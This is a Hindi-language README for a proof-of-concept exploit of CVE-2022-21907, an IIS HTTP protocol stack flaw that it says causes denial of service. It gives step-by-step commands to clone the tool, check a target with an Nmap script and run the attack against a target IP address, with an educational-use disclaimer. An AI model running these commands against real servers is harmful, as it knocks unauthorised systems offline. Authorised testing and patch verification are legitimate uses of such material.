
CVE-2022-21907 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, HTTP प्रोटोकॉल स्टैक (IIS) में एक दूरस्थ कोड निष्पादन भेद्यता। पता लगाने और शोषण के लिए एक पायथन स्क्रिप्ट और Nmap स्क्रिप्ट शामिल है।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए
मूल PoC लेखक NU11SECURITY और michelep के प्रति बहुत आभारी हैं।
HTTP प्रोटोकॉल स्टैक रिमोट कोड एक्सेक्यूशन भेद्यता। यह भेद्यता IIS वेब सर्वर वाले लक्ष्य सिस्टम पर denial-of-service हमले का कारण बनेगी।
git स्थापित करें, फिर github रिपॉजिटरी से PoC क्लोन करें:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
pip3 कमांड का उपयोग करके आवश्यकताएँ स्थापित करें:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
कमांड का उपयोग करके लक्ष्य मशीन पर भेद्यता की उपस्थिति की जाँच करें:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
फिर, कमांड का उपयोग करके PoC स्क्रिप्ट चलाएँ:
python3 CVE-2022-21907.py -i 10.10.1.10
नोट्स: -i विकल्पों को लक्ष्य IP पते के साथ निर्दिष्ट करें